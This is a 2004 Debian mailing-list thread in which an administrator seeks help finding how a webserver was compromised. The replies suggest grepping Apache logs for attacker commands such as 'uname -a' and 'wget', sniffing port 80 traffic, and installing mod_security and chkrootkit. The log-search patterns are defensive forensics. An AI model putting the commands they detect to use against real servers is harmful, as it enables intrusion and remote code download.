can find the web address on something like freshmeat.net or Google
easily.
[snip]
I need to find the vulnerable code on this box. And I have no idea
where to begin.
I've tried running virus scans, nothing is infected.
[snip]
The files you found within /tmp - Grep Apache's access /and/ error logs
for these file names. Other common things to grep for include the use of
uname -a, ls -l, wget, remembering you may need to substitue a
space for %20:
# grep -i 'uname%20-a' {access,error}.log
# grep -i 'wget' {access,error}.log
How about running a packet sniffer on port 80 too and monitor the
traffic. Log to a text file and grep that?
HTH.
David.
--
.''`. David Ramsden [EMAIL PROTECTED]
: :' :http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
`- Debian - when you have better things to do than to fix a system.
pgpgtxFBKrBuW.pgp
Description: PGP signature
Re: Advice needed, trying to find the vulnerable code on Debian webserver.
Look at installing mod_security, http://modsecurity.org Install some rules for it to harden your webserver, see if anything is flagged in the security log. Ross Tsolakidis wrote: Wipe, install, set up chkrootkit and run it often. I've already done that. There was no rootkit. How does phpnuke compromise apache if apache is set up correctly? I believe it's some of the modules available and running php with 'safe mode off'. I need to find the vulnerable code on this box. And I have no idea where to begin. I've tried running virus scans, nothing is infected. -- Ross
Re: Advice needed, trying to find the vulnerable code on Debian webserver.
hi ya On Wed, 16 Jun 2004, TiM wrote: Look at installing mod_security, http://modsecurity.org Install some rules for it to harden your webserver, see if anything is flagged in the security log. other web server testing tools http://www.linux-sec.net/Web/#Testing c ya alvin
